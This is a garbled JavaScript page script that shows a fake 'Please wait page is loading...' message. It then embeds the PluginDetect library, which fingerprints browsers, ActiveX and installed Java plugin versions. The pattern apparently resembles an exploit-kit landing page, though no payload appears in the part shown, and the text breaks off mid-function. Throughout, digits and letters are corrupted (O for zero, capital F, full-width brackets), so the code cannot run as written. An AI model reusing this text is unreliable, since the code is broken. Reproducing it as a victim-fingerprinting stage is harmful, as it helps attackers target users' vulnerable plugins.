document・write('<center><h1>Please wait page is loading...</h1></center><hr>'); Function end_redirect(){ } try { var PluginDetect = { version : "O.7.8", name : "PluginDetect", handler : Function (c, b, a){ return Function (){ c(b, a) } } , isDeFined : Function (b){ return typeoF b != "undeFined" } , isArray : Function (b){ return (/array/i).test(Object.prototype.toString.call(b)) } , isFunc : Function (b){ return typeoF b == "Function" } , isString : Function (b){ return typeoF b == "string" } , isNum : Function (b){ return typeoF b == "number" } , isStrNum : Function (b){ return (typeoF b == "string" && (/\d/).test(b)) } , getNumRegx :/ 「 \ d」「 \ d \ . \ _ ,- 」 */, splitNumRegx :/ 「 \ . \ _ ,- 」 / g, getNum : Function (b, c){ var d = this , a = d.isStrNum(b) ? (d.isDeFined(c) ? new RegExp(c) : d.getNumRegx). exec(b) : null; return a ? a「O」 : null } , compareNums : Function (h, F, d){ var e = this , c, b, a, g = parseInt; iF (e.isStrNum(h) && e.isStrNum(F)){ iF (e.isDeFined(d) && d.compareNums){ return d.compareNums(h, F) } c = h.split(e.splitNumRegx); b = F.split(e.splitNumRegx); For (a = O; a < Math.min(c.length, b.length); a ++ ){ iF (g(c「a」, 1O) > g(b「a」, 1O)){ return 1 } iF (g(c「a」, 1O) < g(b「a」, 1O)){ return - 1 } } } return O } , FormatNum : Function (b, c){ var d = this , a, e; iF (!d.isStrNum(b)){ return null } iF (!d.isNum(c)){ c = 4 } c--; e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(「"O", "O", "O", "O"」); For (a = O; a < 4; a ++ ){ iF (/^(O+)(.+)$/.test(e「a」)){ e「a」 = RegExp.$2 } iF (a > c ||! (/\d/).test(e「a」)){ e「a」 = "O" } } return e.slice(O, 4).join(",") } , $$hasMimeType : Function (a){ return Function (c){ iF (!a.isIE && c){ var F, e, b, d = a.isArray(c) ? c : (a.isString(c) ? 「c」 : 「」); For (b = O; b < d.length; b ++ ){ iF (a.isString(d「b」) &&/ 「 ^\ s」 / .test(d「b」)){ F = navigator.mimeTypes「d「b」」; e = F ? F.enabledPlugin : O; iF (e && (e.name || e.description)){ return F } } } } return null } } , FindNavPlugin : Function (l, e, c){ var j = this , h = new RegExp(l, "i"), d = (!j.isDeFined(e) || e) ?/\ d /: O, k = c ? new RegExp(c, "i") : O, a = navigator.plugins, g = "", F, b, m; For (F = O; F < a.length; F ++ ){ m = a「F」.description || g; b = a「F」.name || g; iF ((h.test(m) && (!d || d.test(RegExp.leFtContext + RegExp.rightContext))) || (h. test(b) && (!d || d.test(RegExp.leFtContext + RegExp.rightContext)))){ iF (!k ||! (k.test(m) || k.test(b))){ return a「F」 } } } return null } , getMimeEnabledPlugin : Function (k, m, c){ var e = this , F, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : O, a, l, d, j = e.isString(k) ? 「k」 : k; For (d = O; d < j.length; d ++ ){ iF ((F = e.hasMimeType(j「d」)) && (F = F.enabledPlugin)){ l = F.description || h; a = F.name || h; iF (b.test(l) || b.test(a)){ iF (!g ||! (g.test(l) || g.test(a))){ return F } } } } return O } , getPluginFileVersion : Function (F, b){ var h = this , e, d, g, a, c =- 1; iF (h.OS > 2 ||! F ||! F.version ||! (e = h.getNum(F.version))){ return b } iF (!b){ return e } e = h.FormatNum(e); b = h.FormatNum(b); d = b.split(h.splitNumRegx); g = e.split(h.splitNumRegx); For (a = O; a < d.length; a ++ ){ iF (c >- 1 && a > c && d「a」 != "O"){ return b } iF (g「a」 != d「a」){ iF (c ==- 1){ c = a } iF (d「a」 != "O"){ return b } } } return e } , AXO : window.ActiveXObject, getAXO : Function (a){ var F = null, d, b = this , c = { } ; try { F = new b.AXO(a) } catch (d){ } return F } , convertFuncs : Function (F){ var a, g, d, b =/^ 「 \ $」「 \ $」 /, c = this ; For (ain F){ iF (b.test(a)){ try { g = a.slice(2); iF (g.length > O &&! F「g」){ F「g」 = F「a」(F); deleteF「a」 } } catch (d){ } } } } , initObj : Function (e, b, d){ var a, c; iF (e){ iF (e「b「O」」 == 1 || d){ For (a = O; a < b.length; a = a + 2){ e「b「a」」 = b「a + 1」 } } For (ain e){ c = e「a」; iF (c && c「b「O」」 == 1){ this .initObj(c, b) } } } } , initScript : Function (){ var c = this , a = navigator, e = "/", F, i = a.userAgent || "", g = a.vendor || "", b = a.platForm || "", h = a.product || ""; c.initObj(c, 「"$", c」); For (Fin c.Plugins){ iF (c.Plugins「F」){ c.initObj(c.Plugins「F」, 「"$", c, "$$", c.Plugins「F」」, 1) } } ; c.OS = 1OO; iF (b){ var d = 「"Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "" , 1OO」; For (F = d.length - 2; F >= O; F = F - 2){ iF (d「F」 && new RegExp(d「F」, "i").test(b)){ c.OS = d「F + 1」; break } } } c.convertFuncs(c); c.head = (document.getElementsByTagName("head")「O」 || document.getElementsByTagName( "body")「O」 || document.body || null); c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "False"))(); c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 1O) : null ; c.ActiveXEnabled = False; iF (c.isIE){ var F, j = 「"Msxml2.XMLhOOp", "Msxml2.DOMDocument", "MicrosoFt.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"」; For (F = O; F < j.length; F ++ ){ iF (c.getAXO(j「F」)){ c.ActiveXEnabled = true; break } } } c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i); c.verGecko = c.isGecko ? c.FormatNum((/rv\s*\:\s*(「\.\,\d」+)/i).test(i) ? RegExp.$1 : "O.9") : null; c.isChrome = (/Chrome\s*\/\s*(\d「\d\.」*)/i).test(i); c.verChrome = c.isChrome ? c.FormatNum(RegExp.$1) : null; c.isSaFari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && ( /SaFari\s*\/\s*(\d「\d\.」*)/i).test(i); c.verSaFari = c.isSaFari && (/Version\s*\/\s*(\d「\d\.」*)/i).test(i) ? c.FormatNum( RegExp.$1) : null; c.isOpera = (/Opera\s*「\/」?\s*(\d+\.?\d*)/i).test(i); c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 1O) : null; c.addWinEvent("load", c.handler(c.runWLFuncs, c)) } , init : Function (d){ var c = this , b, d, a = { status :- 3, plugin : O } ; iF (!c.isString(d)){ return a } iF (d.length == 1){ c.getVersionDelimiter = d; return a } d = d.toLowerCase().replace(/\s/g, ""); b = c.Plugins「d」; iF (!b ||! b.getVersion){ return a } a.plugin = b; iF (!c.isDeFined(b.installed)){ b.installed = null; b.version = null; b.versionO = null; b.getVersionDone = null; b.pluginName = d } c.garbage = False; iF (c.isIE &&! c.ActiveXEnabled && d !== "java"){ a.status =- 2; return a } a.status = 1; return a } , FPush : Function (b, a){ var c = this ; iF (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > O && c.isFunc(b「O 」)))){ a.push(b) } } , callArray : Function (b){ var c = this , a; iF (c.isArray(b)){ For (a = O; a < b.length; a ++ ){ iF (b「a」 === null){ return } c.call(b「a」); b「a」 = null } } } , call : Function (c){ var b = this , a = b.isArray(c) ? c.length :- 1; iF (a > O && b.isFunc(c「O」)){ c「O」(b, a > 1 ? c「1」 : O, a > 2 ? c「2」 : O, a > 3 ? c「3」 : O) } else { iF (b.isFunc(c)){ c(b) } } } , getVersionDelimiter : ",", $$getVersion : Function (a){ return Function (g, d, c){ var e = a.init(g), F, b, h = { } ; iF (e.status < O){ return null } ; F = e.plugin; iF (F.getVersionDone != 1){ F.getVersion(null, d, c); iF (F.getVersionDone === null){ F.getVersionDone = 1 } } a.cleanup(); b = (F.version || F.versionO); b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b; return b } } , cleanup : Function (){ var a = this ; iF (a.garbage && a.isDeFined(window.CollectGarbage)){ window.CollectGarbage() } } , addWinEvent : Function (d, c){ var e = this , a = window, b; iF (e.isFunc(c)){ iF (a.addEventListener){ a.addEventListener(d, c, False) } else { iF (a.attachEvent){ a.attachEvent("on" + d, c) } else { b = a「"on" + d」; a「"on" + d」 = e.winHandler(c, b) } } } } , winHandler : Function (d, c){ return Function (){ d(); iF (typeoF c == "Function"){ c() } } } , WLFuncsO : 「」, WLFuncs : 「」, runWLFuncs : Function (a){ var b = { } ; a.winLoaded = true; a.callArray(a.WLFuncsO); a.callArray(a.WLFuncs); iF (a.onDoneEmptyDiv){ a.onDoneEmptyDiv() } } , winLoaded : False, $$onWindowLoaded : Function (a){ return Function (b){ iF (a.winLoaded){ a.call(b) } else { a.FPush(b, a.WLFuncs) } } } , $$onDetectionDone : Function (a){ return Function (h, g, c, b){ var d = a.init(h), k, e, j = { } ; iF (d.status ==- 3){ return - 1 } e = d.plugin; iF (!a.isArray(e.Funcs)){ e.Funcs = 「」 } iF (e.getVersionDone != 1){ k = a.isMinVersion ? a.isMinVersion(h, "O", c, b) : a.getVersion(h, c, b) } iF (e.installed !=- O.5 && e.installed != O.5){ a.call(g); return 1 } iF (e.NOTF){ a.FPush(g, e.Funcs); return O } return 1 } } , div : null, divID : "plugindetect", divWidth : 5O, pluginSize : 1, emptyDiv : Function (){ var d = this , b, h, c, a, F, g; iF (d.div && d.div.childNodes){ For (b = d.div.childNodes.length - 1; b >= O; b -- ){ c = d.div.childNodes「b」; iF (c && c.childNodes){ For (h = c.childNodes.length - 1; h >= O; h -- ){ g = c.childNodes「h」; try { c.removeChild(g) } catch (F){ } } } iF (c){ try { d.div.removeChild(c) } catch (F){ } } } } iF (!d.div){ a = document.getElementById(d.divID); iF (a){ d.div = a } } iF (d.div && d.div.parentNode){ try { d.div.parentNode.removeChild(d.div) } catch (F){ } d.div = null } } , DONEFuncs : 「」, onDoneEmptyDiv : Function (){ var c = this , a, b; iF (!c.winLoaded){ return } iF (c.WLFuncs && c.WLFuncs.length && c.WLFuncs「c.WLFuncs.length - 1」 !== null){ return } For (ain c){ b = c「a」; iF (b && b.Funcs){ iF (b.OTF == 3){ return } iF (b.Funcs.length && b.Funcs「b.Funcs.length - 1」 !== null){ return } } } For (a = O; a < c.DONEFuncs.length; a ++ ){ c.callArray(c.DONEFuncs) } c.emptyDiv() } , getWidth : Function (c){ iF (c){ var a = c.scrollWidth || c.oFFsetWidth, b = this ; iF (b.isNum(a)){ return a } } return - 1 } , getTagStatus : Function (m, g, a, b){ var c = this , F, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d = g.span, i = c.getWidth(d); iF (!k ||! h ||! d ||! c.getDOMobj(m)){ return - 2 } iF (j < i || l < O || j < O || i < O || i <= c.pluginSize || c.pluginSize < 1){ return O } iF (l >= i){ return - 1 } try { iF (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){ iF (!m.winLoaded && c.winLoaded){ return 1 } iF (m.winLoaded && c.isNum(b)){ iF (!c.isNum(m.count)){ m.count = b } iF (b - m.count >= 1O){ return 1 } } } } catch (F){ } return O } , getDOMobj : Function (g, a){ var F, d = this , c = g ? g.span : O, b = c && c.FirstChild ? 1 : O; try { iF (b && a){ d.div.Focus() } } catch (F){ } return b ? c.FirstChild : null } , setStyle : Function (b, g){ var F = b.style, a, d, c = this ; iF (F && g){ For (a = O; a < g.length; a = a + 2){ try { F「g「a」」 = g「a + 1」 } catch (d){ } } } } , insertDivInBody : Function (a, i){ var h, F = this , b = "pd33993399", d = null, j = i ? window.top.document : window. document, c = "<", g = (j.getElementsByTagName("body")「O」 || j.body); iF (!g){ try { j.write(c + 'div id="' + b + '">o' + c + "/div>"); d = j.getElementById(b) } catch (h){ } } g = (j.getElementsByTagName("body")「O」 || j.body); iF (g){ iF (g.FirstChild && F.isDeFined(g.insertBeFore)){ g.insertBeFore(a, g.FirstChild) } else { g.appendChild(a) } iF (d){ g.removeChild(d) } } else { } } , insertHTML : Function (g, b, h, a, l){ var m, n = document, k = this , q, p = n.createElement("span"), o, j, F = "<"; var c = 「"outlineStyle", "none", "borderStyle", "none", "padding", "Opx", "margin", "Opx", "visibility", "visible"」; var i = "outline-style:none;border-style:none;padding:Opx;margin:Opx;visibility:visible;"; iF (!k.isDeFined(a)){ a = "" } iF (k.isString(g) && (/「^\s」/).test(g)){ g = g.toLowerCase().replace(/\s/g, ""); q = F + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" '; q += 'style="' + i + 'display:inline;" '; For (o = O; o < b.length; o = o + 2){ iF (/「^\s」/.test(b「o + 1」)){ q += b「o」 + '="' + b「o + 1」 + '" ' } } q += ">"; For (o = O; o < h.length; o = o + 2){ iF (/「^\s」/.test(h「o + 1」)){ q += F + 'param name="' + h「o」 + '" value="' + h「o + 1」 + '" />' } } q += a + F + "/" + g + ">" } else { q = a } iF (!k.div){ j = n.getElementById(k.divID); iF (j){ k.div = j } else { k.div = n.createElement("div"); k.div.id = k.divID } k.setStyle(k.div, c.concat(「"width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "FontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"」)); iF (!j){ k.setStyle(k.div, 「"position", "absolute", "right", "Opx", "top", "Opx"」); k.insertDivInBody(k.div) } } iF (k.div && k.div.parentNode){ k.setStyle(p, c.concat(「"FontSize", (k.pluginSize + 3) + "px", "lineHeight", (k. pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"」)); try { p.innerHTML = q } catch (m){ } ; try { k.div.appendChild(p) } catch (m){ } ; return { span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q } } return { span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q } } , File : { $ : 1, any : "FileStorageAny999", valid : "FileStorageValid999", save : Function (d, F, c){ var b = this , e = b.$, a; iF (d && e.isDeFined(c)){ iF (!d「b.any」){ d「b.any」 = 「」 } iF (!d「b.valid」){ d「b.valid」 = 「」 } d「b.any」.push(c); a = b.split(F, c); iF (a){ d「b.valid」.push(a) } } } , getValidLength : Function (a){ return a && a「this .valid」 ? a「this .valid」.length : O } , getAnyLength : Function (a){ return a && a「this .any」 ? a「this .any」.length : O } , getValid : Function (c, a){ var b = this ; return c && c「b.valid」 ? b.get(c「b.valid」, a) : null } , getAny : Function (c, a){ var b = this ; return c && c「b.any」 ? b.get(c「b.any」, a) : null } , get : Function (d, a){ var c = d.length - 1, b = this .$.isNum(a) ? a : c; return (b < O || b > c) ? null : d「b」 } , split : Function (g, c){ var b = this , e = b.$, F = null, a, d; g = g ? g.replace(".", "\\.") : ""; d = new RegExp("^(.*「^\\/」)(" + g + "\\s*)$"); iF (e.isString(c) && d.test(c)){ a = (RegExp.$1).split("/"); F = { name : a「a.length - 1」, ext : RegExp.$2, Full : c } ; a「a.length - 1」 = ""; F.path = a.join("/") } return F } , z : O } , Plugins : { java : { mimeType : 「"application/x-java-applet", "application/x-java-vm", "application/x-java-bean"」, classID : "clsid:8AD9C84O-O44E-11D1-B3E9-OO8O5F499D93" , navigator : { a : window.navigator.javaEnabled(), javaEnabled : Function (){ return this .a } , mimeObj : O, pluginObj : O } , OTF : null, minIEver : 7, debug : O, debugEnable : Function (){ var a = this , b = a.$; a.debug = 1 } , isDisabled : { $ : 1, DTK : Function (){ var a = this , c = a.$, b = a.$$; iF ((c.isGecko && c.compareNums(c.verGecko, c.FormatNum("1.6")) <= O) || (c. isSaFari && c.OS == 1 && (!c.verSaFari || c.compareNums(c.verSaFari, "5,1,O,O" ) < O)) || c.isChrome || (c.isIE &&! c.ActiveXEnabled)){ return 1 } return O } , AXO : Function (){ var a = this , c = a.$, b = a.$$; return (!c.isIE ||! c.ActiveXEnabled || (!b.debug && b.DTK.query().status !== O)) } , navMime : Function (){ var b = this , d = b.$, c = b.$$, a = c.navigator; iF (d.isIE ||! a.mimeObj ||! a.pluginObj){ return 1 } return O } , navPlugin : Function (){ var b = this , d = b.$, c = b.$$, a = c.navigator; iF (d.isIE ||! a.mimeObj ||! a.pluginObj){ return 1 } return O } , windowDotJava : Function (){ var a = this , c = a.$, b = a.$$; iF (!window.java){ return 1 } iF (c.OS == 2 && c.verOpera && c.verOpera < 9.2 && c.verOpera >= 9){ return 1 } iF (c.verGecko && c.compareNums(c.verGecko, "1,9,O,O") < O && c.compareNums(c. verGecko, "1,8,O,O") >= O){ return 1 } return O } , allApplets : Function (){ var b = this , d = b.$, c = b.$$, a = c.navigator; iF (d.OS >= 2O){ return O } iF (d.verOpera && d.verOpera < 11 &&! a.javaEnabled() &&! c.lang.System. getProperty()「O」){ return 1 } iF ((d.verGecko && d.compareNums(d.verGecko, d.FormatNum("2")) < O) &&! a. mimeObj &&! c.lang.System.getProperty()「O」){ return 1 } return O } , AppletTag : Function (){ var b = this , d = b.$, c = b.$$, a = c.navigator; return d.isIE ?! a.javaEnabled() : O } , ObjectTag : Function (){ var a = this , c = a.$, b = a.$$; return c.isIE ?! c.ActiveXEnabled : O } , z : O } , getVeriFyTagsDeFault : Function (){ var a = this , c = a.$, b = 「1, O, 1」; iF (c.OS >= 2O){ return b } iF ((c.isIE && (c.verIE < 9 ||! c.ActiveXEnabled)) || (c.verGecko && c. compareNums(c.verGecko, c.FormatNum("2")) < O) || (c.isSaFari && (!c.verSaFari || c.compareNums(c.verSaFari, c.FormatNum("4")) < O)) || (c.verOpera && c.verOpera < 1O)){ b = 「1, 1, 1」 } return b } , getVersion : Function (j, g, i){ var b = this , d = b.$, e, a = b.applet, h = b.veriFy, k = b.navigator, F = null , l = null, c = null; iF (b.getVersionDone === null){ b.OTF = O; k.mimeObj = d.hasMimeType(b.mimeType); iF (k.mimeObj){ k.pluginObj = k.mimeObj.enabledPlugin } iF (h){ h.begin() } } a.setVeriFyTagsArray(i); d.File.save(b, ".jar", g); iF (b.getVersionDone === O){ iF (a.should_Insert_Query_Any()){ e = a.insert_Query_Any(); b.setPluginStatus(e「O」, e「1」, F) } return } iF ((!F || b.debug) && b.DTK.query().version){ F = b.DTK.version } iF ((!F || b.debug) && b.navMime.query().version){ F = b.navMime.version } iF ((!F || b.debug) && b.navPlugin.query().version){ F = b.navPlugin.version } iF ((!F || b.debug) && b.AXO.query().version){ F = b.AXO.version } iF (b.nonAppletDetectionOk(F)){ c = F } iF (!c || b.debug || a.VeriFyTagsHas(2.2) || a.VeriFyTagsHas(2.5)){ e = b.lang.System.getProperty(); iF (e「O」){ F = e「O」; c = e「O」; l = e「1」 } } b.setPluginStatus(c, l, F); iF (a.should_Insert_Query_Any()){ e = a.insert_Query_Any(); iF (e「O」){ c = e「O」; l = e「1」 } } b.setPluginStatus(c, l, F) } , nonAppletDetectionOk : Function (b){ var d = this , e = d.$, a = d.navigator, c = 1; iF (!b || (!a.javaEnabled() &&! d.lang.System.getPropertyHas(b)) || (!e.isIE &&! a.mimeObj &&! d.lang.System.getPropertyHas(b)) || (e.isIE &&! e.ActiveXEnabled )){ c = O } else { iF (e.OS >= 2O){ } else { iF (d.inFo && d.inFo.getPlugin2Status() < O && d.inFo.BrowserRequiresPlugin2 ()){ c = O } } } return c } , setPluginStatus : Function (d, F, a){ var c = this , e = c.$, b; a = a || c.versionO; iF (c.OTF > O){ d = d || c.lang.System.getProperty()「O」 } iF (c.OTF < 3){ b = d ? 1 : (a ?- O.2 :- 1); iF (c.installed === null || b > c.installed){ c.installed = b } } iF (c.OTF == 2 && c.NOTF &&! c.applet.getResult()「O」 &&! c.lang.System. getProperty()「O」){ c.installed = a ?- O.2 :- 1 } ; iF (c.OTF == 3 && c.installed !=- O.5 && c.installed != O.5){ c.installed = (c.NOTF.isJavaActive(1) == 1 || c.lang.System.getProperty()「O」) ? O.5 :- O.5 } iF (c.OTF == 4 && (c.installed ==- O.5 || c.installed == O.5)){ iF (d){ c.installed = 1 } else { iF (c.NOTF.isJavaActive(1) == 1){ iF (a){ c.installed = 1; d = a } else { c.installed = O } } else { iF (a){ c.installed =- O.2 } else { c.installed =- 1 } } } } ; iF (a){ c.versionO = e.FormatNum(e.getNum(a)) } iF (d){ c.version = e.FormatNum(e.getNum(d)) } iF (F && e.isString(F)){ c.vendor = F } iF (!c.vendor){ c.vendor = "" } iF (c.veriFy && c.veriFy.isEnabled()){ c.getVersionDone = O } else { iF (c.getVersionDone != 1){ iF (c.OTF < 2){ c.getVersionDone = O } else { c.getVersionDone = c.applet.can_Insert_Query_Any() ? O : 1 } } } } , DTK : { $ : 1, hasRun : O, status : null, VERSIONS : 「」, version : "", HTML : null, Plugin2Status : null, classID : 「"clsid:CAFEEFAC-DEC7-OOOO-OOO1-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-OOOO-OOOO-ABCDEFFEDCBA"」, mimeType : 「 "application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"」, disabled : Function (){ return this .$$.isDisabled.DTK() } , query : Function (){ var k = this , g = k.$, d = k.$$, j, l, h, m = { } , F = { } , a, c = null, i = null, b = (k.hasRun || k.disabled()); k.hasRun = 1; iF (b){ return k } k.status = O; iF (g.isIE && g.verIE >= 6){ For (l = O; l < k.classID.length; l ++ ){ k.HTML = g.insertHTML("object", 「"classid", k.classID「l」」, 「」); c = g.getDOMobj(k.HTML); try { iF (c && c.jvms){ break } } catch (j){ } } } else { iF (!g.isIE && (h = g.hasMimeType(k.mimeType)) && h.type){ k.HTML = g.insertHTML("object", 「"type", h.type」, 「」); c = g.getDOMobj(k.HTML) } } iF (c){ try { a = c.jvms; iF (a){ i = a.getLength(); iF (g.isNum(i)){ k.status = i > O ? 1 :- 1; For (l = O; l < i; l ++ ){ h = g.getNum(a.get(i - 1 - l).version); iF (h){ k.VERSIONS.push(h); F「"a" + g.FormatNum(h)」 = 1 } } } } } catch (j){ } } h = O; For (lin F){ h ++ } iF (h && h !== k.VERSIONS.length){ k.VERSIONS = 「」 } iF (k.VERSIONS.length){ k.version = g.FormatNum(k.VERSIONS「O」) } ; return k } } , AXO : { $ : 1, hasRun : O, VERSIONS : 「」, version : "", disabled : Function (){ return this .$$.isDisabled.AXO() } , JavaVersions : 「「1, 9, 1, 4O」, 「1, 8, 1, 4O」, 「1, 7, 1, 4O」, 「1, 6, O, 4O」, 「1 , 5, O, 3O」, 「1, 4, 2, 3O」, 「1, 3, 1, 3O」」, query : Function (){ var a = this , e = a.$, b = a.$$, c = (a.hasRun || a.disabled()); a.hasRun = 1; iF (c){ return a } var i = 「」, k = 「1, 5, O, 14」, j = 「1, 6, O, 2」, h = 「1, 3, 1, O」, g = 「1, 4, 2, O」, F = 「1, 5, O, 7」, d = b.getInFo ? true : False, l = { } ; iF (e.verIE >= b.minIEver){ i = a.search(j, j, d); iF (i.length > O && d){ i = a.search(k, k, d) } } else { iF (d){ i = a.search(F, F, true) } iF (i.length == O){ i = a.search(h, g, False) } } iF (i.length){ a.version = i「O」; a.VERSIONS = 「」.concat(i) } ; return a } , search : Function (a, j, p){ var h, d, F = this , e = F.$, k = F.$$, n, c, l, q, b, o, r, i = 「」; iF (e.compareNums(a.join(","), j.join(",")) > O){ j = a } j = e.FormatNum(j.join(",")); var m, s = "1,4,2,O", g = "JavaPlugin." + a「O」 + "" + a「1」 + "" + a「2」 + "" + (a「3」 > O ? ("_" + (a「3」 < 1O ? "O" : "") + a「3」) : ""); For (h = O; h < F.JavaVersions.length; h ++ ){ d = F.JavaVersions「h」; n = "JavaPlugin." + d「O」 + "" + d「1」; b = d「O」 + "." + d「1」 + "."; For (l = d「2」; l >= O; l -- ){ r = "JavaWebStart.isInstalled." + b + l + ".O"; iF (e.compareNums(d「O」 + "," + d「1」 + "," + l + ",O", j) >= O &&! e.getAXO (r)){ continue } m = e.compareNums(d「O」 + "," + d「1」 + "," + l + ",O", s) < O ? true : False ; For (q = d「3」; q >= O; q -- ){ c = l + "_" + (q < 1O ? "O" + q : q); o = n + c; iF (e.getAXO(o) && (m || e.getAXO(r))){ i.push(b + c); iF (!p){ return i } } iF (o == g){ return i } } iF (e.getAXO(n + l) && (m || e.getAXO(r))){ i.push(b + l); iF (!p){ return i } } iF (n + l == g){ return i } } } return i } } , navMime : { $ : 1, hasRun : O, mimetype : "", version : "", length : O, mimeObj : O, pluginObj : O, disabled : Function (){ return this .$$.isDisabled.navMime() } , query : Function (){ var i = this , F = i.$, a = i.$$, b = (i.hasRun || i.disabled()); i.hasRun = 1; iF (b){ return i } ; var n =/^\ s * application \/ x - java - applet; jpi - version \ s *=\ s * ( \ d. * )$ / i, g, l, j, d = "", h = "a", o, m, k = { } , c = F.FormatNum("O"); For (l = O; l < navigator.mimeTypes.length; l ++ ){ o = navigator.mimeTypes「l」; m = o ? o.enabledPlugin : O; g = o && n.test(o.type || d) ? F.FormatNum(F.getNum(RegExp.$1)) : O; iF (g && m && (m.description || m.name)){ iF (!k「h + g」){ i.length ++ } k「h + g」 = o.type; iF (F.compareNums(g, c) > O){ c = g } } } g = k「h + c」; iF (g){ o = F.hasMimeType(g); i.mimeObj = o; i.pluginObj = o ? o.enabledPlugin : O; i.mimetype = g; i.version = c } ; return i } } , navPlugin : { $ : 1, hasRun : O, version : "", disabled : Function (){ return this .$$.isDisabled.navPlugin() } , query : Function (){ var m = this , e = m.$, c = m.$$, h = c.navigator, j, l, k, g, d, a, i, F = O, b = (m.hasRun || m.disabled()); m.hasRun = 1; iF (b){ return m } ; a = h.pluginObj.name || ""; i = h.pluginObj.description || ""; iF (!F || c.debug){ g =/ Java. * TM. * PlatForm「 ^\ d」 * ( \ d + )( ?: 「 \ ., _」( \ d * )) ? ( ?:\ s * 「Update」 +\ s * ( \ d * )) ?/ i; iF ((g.test(a) || g.test(i)) && parseInt(RegExp.$1, 1O) >= 5){ F = "1," + RegExp.$1 + "," + (RegExp.$2 ? RegExp.$2 : "O") + "," + (RegExp .$3 ? RegExp.$3 : "O") } } iF (!F || c.debug){ g =/ Java「 ^\ d」 * Plug - in / i; l = g.test(i) ? e.FormatNum(e.getNum(i)) : O; k = g.test(a) ? e.FormatNum(e.getNum(a)) : O; iF (l && (e.compareNums(l, e.FormatNum("1,3")) < O || e.compareNums(l, e. FormatNum("2")) >= O)){ l = O } iF (k && (e.compareNums(k, e.FormatNum("1,3")) < O || e.compareNums(k, e. FormatNum("2")) >= O)){ k = O } d = l && k ? (e.compareNums(l, k) > O ? l : k) : (l || k); iF (d){ F = d } } iF (!F && e.isSaFari && e.OS == 2){ j = e.FindNavPlugin("Java.*\\d.*Plug-in.*Cocoa", O); iF (j){ l = e.getNum(j.description); iF (l){ F = l } } } ; iF (F){ m.version = e.FormatNum(F) } ; return m } } , lang : { $ : 1, System : { $ : 1, hasRun : O, result : 「null, null」, disabled : Function (){ return this .$$.isDisabled.windowDotJava() } , getPropertyHas : Function (a){ var b = this , d = b.$, c = b.getProperty()「O」; return (a && c && d.compareNums(d.FormatNum(a), d.FormatNum(c)) === O) ? 1 : O } , getProperty : Function (){ var F = this , g = F.$, d = F.$$, i, h = { } , b = (F.hasRun || F.disabled()); F.hasRun = 1; iF (!b){ var a = "java_qqq99O"; g「a」 = null; try { var c = document.createElement("script"); c.type = "text/javascript"; c.appendChild(document.createTextNode( "(Function(){var e;try{iF (window.java && window.java.lang && window.java.lang.System){" + g.name + "." + a + ' =「window.java.lang.System.getProperty("java.version")+" ",window.java.lang.System.getPrope rty("java.vendor")+" "」}}catch(e){}})();')); iF (g.head.FirstChild){ g.head.insertBeFore(c, g.head.FirstChild) } else { g.head.appendChild(c) } g.head.removeChild(c) } catch (i){ } iF (g「a」 && g.isArray(g「a」)){ F.result = 「」.concat(g「a」) } } return F.result } } } , applet : { $ : 1, results : 「「null, null」, 「null, null」, 「null, null」」, getResult : Function (){ var c = this .results, a, b = 「」; For (a = O; a < c.length; a ++ ){ b = c「a」; iF (b「O」){ break } } return 「」.concat(b) } , HTML : 「O, O, O」, active : 「O, O, O」, DummyObjTagHTML : O, DummySpanTagHTML : O, allowed : 「1, 1, 1」, VeriFyTagsHas : Function (c){ var d = this , b; For (b = O; b < d.allowed.length; b ++ ){ iF (d.allowed「b」 === c){ return 1 } } return O } , saveAsVeriFyTagsArray : Function (c){ var b = this , d = b.$, a; iF (d.isArray(c)){ For (a = O; a < b.allowed.length; a ++ ){ iF (d.isNum(c「a」)){ iF (c「a」 < O){ c「a」 = O } iF (c「a」 > 3){ c「a」 = 3 } b.allowed「a」 = c「a」 } } } } , setVeriFyTagsArray : Function (d){ var b = this , c = b.$, a = b.$$; iF (a.getVersionDone === null){ b.saveAsVeriFyTagsArray(a.getVeriFyTagsDeFault()) } iF (a.debug || (a.veriFy && a.veriFy.isEnabled())){ b.saveAsVeriFyTagsArray(「3, 3, 3」) } else { iF (d){ b.saveAsVeriFyTagsArray(d) } } } , allDisabled : Function (){ return this .$$.isDisabled.allApplets() } , isDisabled : Function (d){ var b = this , c = b.$, a = b.$$; iF (d == 2 &&! c.isIE){ return 1 } iF (d === O || d == 2){ return a.isDisabled.ObjectTag() } iF (d == 1){ return a.isDisabled.AppletTag() } } , can_Insert_Query : Function (b){ var a = this ; iF (a.HTML「b」){ return O } return !a.isDisabled(b) } , can_Insert_Query_Any : Function (){ var b = this , a; For (a = O; a < b.results.length; a ++ ){ iF (b.can_Insert_Query(a)){ return 1 } } return O } , should_Insert_Query : Function (d){ var b = this , e = b.allowed, c = b.$, a = b.$$; iF (!b.can_Insert_Query(d)){ return O } iF (e「d」 == 3){ return 1 } iF (e「d」 == 2.8 &&! b.getResult()「O」){ return 1 } iF (e「d」 == 2.5 &&! 